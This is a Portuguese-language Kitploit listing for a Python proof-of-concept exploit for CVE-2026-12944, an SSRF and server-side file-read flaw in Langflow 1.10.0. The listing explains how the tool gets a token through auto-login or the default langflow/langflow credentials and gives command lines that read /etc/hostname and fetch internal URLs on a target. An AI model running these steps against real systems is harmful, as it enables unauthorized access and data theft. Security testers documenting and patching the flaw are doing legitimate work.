Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-12944 — PoC em Python para CVE-2026-12944, uma vulnerabilidade de SSRF via urllib e leitura de arquivos no Langflow 1.10.0. Identifica versões e explora o endpoint custom_component. | Kitploit
Ferramentas/GitHubGitHub/cflowsec/cve-2026-12944
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubcflowsec/cve-2026-12944

CVE-2026-12944

PoC em Python para CVE-2026-12944, uma vulnerabilidade de SSRF via urllib e leitura de arquivos no Langflow 1.10.0. Identifica versões e explora o endpoint custom_component.

Ver Repositório
há 14h 34mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-12944

Langflow 1.10.0 urllib SSRF

Langflow OSS ≤ 1.10.0 — execução de código em componente personalizado via urllib.request / socket. A denylist do scanner de componentes omitia esses módulos da stdlib. A IBM corrigiu isso na 1.10.1.

A IBM classifica como PR:L. O sink de execução é POST /api/v1/custom_component e essa chamada requer um cookie de sessão / bearer token. Como este PoC obtém um:

  1. --test não autentica. Apenas faz GET /api/v1/version (além de um GET / de conectividade).
  2. --read / --fetch autenticam primeiro, depois fazem POST do componente.
  3. O Langflow padrão tem LANGFLOW_AUTO_LOGIN. O script faz e, se o JSON tiver , envia . Sem nome de usuário ou senha.
GET /api/v1/auto_login
access_token
Authorization: Bearer …
  • Se o auto-login estiver desativado (401/token vazio), ele faz POST /api/v1/login com --uname / --password como application/x-www-form-urlencoded (username, password). Os padrões de fábrica são langflow / langflow.
  • Em seguida, POST /api/v1/custom_component com {"code": …} que chama urllib.request.urlopen(...).
  • --uname / --password existem apenas para o passo 4. Não são usados em uma instalação padrão.

    Apenas para testes autorizados. Não execute isto contra sistemas que você não possui ou não tem permissão para testar.

    Requer: Python 3, apenas biblioteca padrão.

    root@kitploit:~
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
    
    FlagO que faz
    -u / --urlURL base do Langflow (obrigatório). http:// ou https://. Um hostname sem esquema é tentado como HTTPS primeiro, depois HTTP. Redirecionamentos http→https mantêm o POST. Certificados TLS inválidos são tentados novamente sem verificação; --insecure ignora a verificação desde o início
    --testApenas fingerprint: GET /api/v1/version (público). Sem login, sem custom_component
    --read PATHDispara o gadget: leitura file:// via urllib.request de PATH (executa no servidor)
    --fetch URLSSRF: urllib.request.urlopen(URL) e imprime o corpo
    --uname / --passwordApenas se AUTO_LOGIN estiver desativado (padrões de fábrica: langflow / langflow)
    --insecureIgnora a verificação TLS
    --timeoutTimeout HTTP em segundos (padrão 30)

    Endpoint do --test: GET /api/v1/version. Um 200 com "version" / "main_version" imprime VERSION, depois IN_WINDOW se essa string for 1.0.0–1.10.0, depois PRESENT. Ele nunca acessa /api/v1/auto_login ou /api/v1/custom_component.

    --read / --fetch acessam GET /api/v1/auto_login (ou POST /api/v1/login), depois POST /api/v1/custom_component.

    Stdout: VERSION, IN_WINDOW, OUT_OF_WINDOW, PRESENT, VULNERABLE, NEED_AUTH, NOT_FOUND, NOT_VULNERABLE, READ.

    Working PoC

    CVE: CVE-2026-12944. Boletim da IBM; atualize para 1.10.1.

    Baixar ferramenta